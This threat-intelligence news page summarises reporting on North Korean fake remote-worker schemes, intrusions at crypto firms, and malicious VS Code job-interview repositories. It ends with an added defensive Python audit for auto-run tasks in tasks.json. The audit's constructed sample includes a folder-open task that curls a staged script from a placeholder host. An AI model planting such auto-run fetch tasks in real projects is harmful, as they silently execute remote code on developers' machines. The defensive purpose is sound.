Mallory

North Korean Threat Actors Use AI-Enabled IT Worker Scams and Target Crypto Firms

Tags: it worker scam, north korea, insider threat, deepfakes, source code theft, cryptocurrency, exploit, cloud secrets, voice cloning
Updated March 6, 2026 at 08:05 PM (2 sources)


Microsoft-linked reporting says North Korean threat actors are using AI to scale and refine long-running “fake IT worker” schemes, where operatives pose as legitimate remote hires to obtain authorized access inside victim organizations. The activity is attributed to DPRK-linked clusters Jasper Sleet and Coral Sleet, with AI used to improve identity fabrication and maintenance (including face/voice manipulation) and to sustain day-to-day communications that help keep fraudulent personas credible, enabling “sustained, large-scale misuse of legitimate access.”

Separately, reporting on suspected DPRK-linked intrusions describes a coordinated campaign against cryptocurrency organizations spanning staking platforms, exchange software providers, and exchanges, with theft of source code, private keys, and cloud secrets. Investigators described two primary access paths: exploitation of CVE-2025-55182 in the React2Shell framework (including mass scanning and WAF-bypass techniques) and the use of pre-obtained valid AWS access tokens to move directly into cloud enumeration; researchers also recovered artifacts from attacker infrastructure (e.g., shell history, archived code, and tool configurations) that provided visibility into post-compromise activity and C2 setup.

Related Stories

Microsoft Warns Threat Actors Are Using Generative AI to Scale Cyberattacks and North Korean Fake Worker Schemes

Microsoft Threat Intelligence reported that threat actors are increasingly using **generative AI** as a “force multiplier” across the cyberattack lifecycle—speeding up reconnaissance, phishing and social engineering, infrastructure setup, malware development/debugging, and post-compromise tasks such as summarizing stolen data and assisting with scripting. The report emphasizes that most observed malicious AI use today centers on language models for producing text, code, and media, reducing technical friction while human operators retain control over targeting and execution. Microsoft highlighted **North Korean** activity as a prominent example, stating that groups it tracks as **Jasper Sleet (Storm-0287)**, **Coral Sleet (Storm-1877)**, and **Sapphire Sleet** are using AI to scale “fake remote worker” operations by rapidly generating realistic personas (names, resumes, communications) tailored to specific job markets and roles. Reported tactics include researching job postings (e.g., on Upwork) to align fabricated profiles with in-demand skills, using AI-generated multilingual lures that mimic internal corporate communications, and employing AI-enabled media manipulation such as **Faceswap** to insert operatives’ faces into stolen identity documents, alongside AI-driven impersonation and real-time voice modulation to improve social engineering and access persistence.

1 week ago
North Korean Contagious Interview Campaign Uses Malicious VS Code Projects

North Korea-linked threat actors tied to the long-running **Contagious Interview** operation have been observed using **malicious Microsoft Visual Studio Code (VS Code) projects** as part of fake job-assessment lures, instructing targets to clone repositories from GitHub/GitLab/Bitbucket and open them in VS Code. The technique abuses VS Code `tasks.json` configuration—specifically `"runOn": "folderOpen"`—to trigger execution when a folder is opened, pulling staged payloads from attacker-controlled infrastructure (including Vercel-hosted domains) and ultimately deploying backdoors such as **BeaverTail** and **InvisibleFerret** that enable remote code execution and follow-on control. Recent iterations reportedly add multi-stage droppers embedded in task configuration content and disguised as benign files (e.g., spell-check dictionaries) to improve resilience if network retrieval fails, and include command-and-control behavior that can execute attacker-supplied JavaScript from a remote server (e.g., `ip-regions-check.vercel[.]app`). Separate reporting on North Korean APT trends indicates continued reliance on **fraudulent IT employment schemes** and recruitment-platform abuse to gain access to Western organizations, including long-term social engineering and persistent remote access via legitimate tools (e.g., *AnyDesk*, *Google Remote Desktop*) and VPN/location obfuscation. This broader pattern aligns with the same overarching tradecraft used in developer-targeted “interview” lures: leveraging hiring workflows and developer tooling to establish initial access and persistence while reducing suspicion, particularly in environments with remote-work infrastructure and developer workstations.

1 month ago
North Korea-linked Social Engineering Campaigns Targeting Developers and Defense Supply Chains

North Korea–aligned operators, including **Lazarus** (aka **HIDDEN COBRA**), are running multiple social-engineering-led intrusion campaigns aimed at stealing sensitive technology and establishing durable access. Reporting on **Operation DreamJob** describes fake job-offer lures used to compromise European drone manufacturers and defense contractors, with tooling and infrastructure designed to evade traditional defenses and support cyber-espionage against UAV-related intellectual property. Separately, a developer-focused operation dubbed **“Fake Font”** uses fake recruiter outreach and malicious GitHub repositories to trick engineers into opening projects that abuse *Visual Studio Code* automation (via `.vscode/tasks.json`) and disguised payloads (e.g., `.woff2` “font” files) to execute multi-stage malware that ultimately deploys the **InvisibleFerret** Python backdoor for credential and crypto-wallet theft and long-term access. A distinct DPRK-linked campaign reported by Darktrace targets South Korean users with spear-phishing that delivers a JSE script masquerading as an HWPX document and then abuses **VS Code tunnels** as a covert C2 channel over trusted Microsoft infrastructure, complicating detection in developer-heavy environments. Other items in the set describe unrelated activity: phishing abuse of *Vercel* to deliver remote-access tooling, exploitation of **CVE-2025-51683** (blind SQLi) in the *Mjobtime* time-tracking app to reach MSSQL `xp_cmdshell`, a hospitality-focused **DCRat** campaign using **ClickFix** and `MSBuild.exe`, a generic CSS exfiltration technique write-up, and Trend Micro research on the **PeckBirdy** LOLBins framework used by China-aligned intrusion sets—none of which are part of the DPRK developer/defense recruitment-themed operations above.
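Both the Contagious Interview story and the "Fake Font" operation above rely on the same VS Code hook: a task in `.vscode/tasks.json` with `"runOptions": {"runOn": "folderOpen"}` runs the moment the cloned folder is opened. The following pre-open audit is an added example, not code from this page or from any of the cited reports; it parses the JSONC that VS Code accepts (comments, trailing commas) and lists any task wired to `folderOpen` together with the command it would launch. The sample `tasks.json` is constructed for illustration and `example.invalid` is a placeholder domain.

```python
"""Audit a cloned repository's .vscode/tasks.json before opening it in VS Code.

Added example (not from the page or the cited reports). It flags tasks that
VS Code would start automatically on folder open via
    "runOptions": {"runOn": "folderOpen"}
so a reviewer can see the command line before any editor runs it.
"""
import json
import re
from pathlib import Path


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments and trailing commas, but leave string
    contents alone (a task command may legitimately contain "https://")."""
    out = []
    i, n = 0, len(text)
    in_str = False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:       # keep escaped char verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):        # line comment
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):        # block comment
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    # Trailing commas before } or ] (outside strings after the pass above;
    # a string literal containing ",}" would be a rare false edit).
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def parse_tasks(text: str) -> dict:
    """Parse a tasks.json document as VS Code's JSONC reader would."""
    return json.loads(strip_jsonc(text))


def find_auto_run_tasks(tasks_doc: dict) -> list[dict]:
    """Return every task that VS Code would execute automatically on folder open."""
    findings = []
    for task in tasks_doc.get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on == "folderOpen":
            findings.append({
                "label": task.get("label", "<unlabelled>"),
                "type": task.get("type"),
                "command": task.get("command"),
                "args": task.get("args", []),
            })
    return findings


def audit_repo(repo: Path) -> list[dict]:
    """Audit <repo>/.vscode/tasks.json; an absent file yields no findings."""
    path = repo / ".vscode" / "tasks.json"
    if not path.is_file():
        return []
    return find_auto_run_tasks(parse_tasks(path.read_text(encoding="utf-8")))


# Constructed sample: two benign tasks and one auto-run task that would fetch
# from a placeholder host. Only the third should be reported.
SAMPLE_TASKS_JSON = r'''{
  // constructed sample, not a real repository
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build",},
    {"label": "docs", "type": "shell", "command": "open https://example.invalid/docs"},
    {
      "label": "setup",
      "type": "shell",
      "command": "curl",
      "args": ["-s", "http://example.invalid/stage.sh"],
      "runOptions": {"runOn": "folderOpen"},
    }
  ]
}'''


def demo() -> list[dict]:
    """Run the audit over the constructed sample."""
    return find_auto_run_tasks(parse_tasks(SAMPLE_TASKS_JSON))


if __name__ == "__main__":
    for f in demo():
        print(f"AUTO-RUN task {f['label']!r}: {f['command']} {' '.join(f['args'])}")
```

Run it against a fresh clone (`audit_repo(Path("path/to/clone"))`) before opening the folder; an empty list means no `folderOpen` task is declared, while any finding should be read as "this command runs without a click" and reviewed, along with any files it references, before the project is trusted. Note that VS Code also prompts about automatic tasks in untrusted workspaces, so this check complements, rather than replaces, Workspace Trust.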

1 month ago
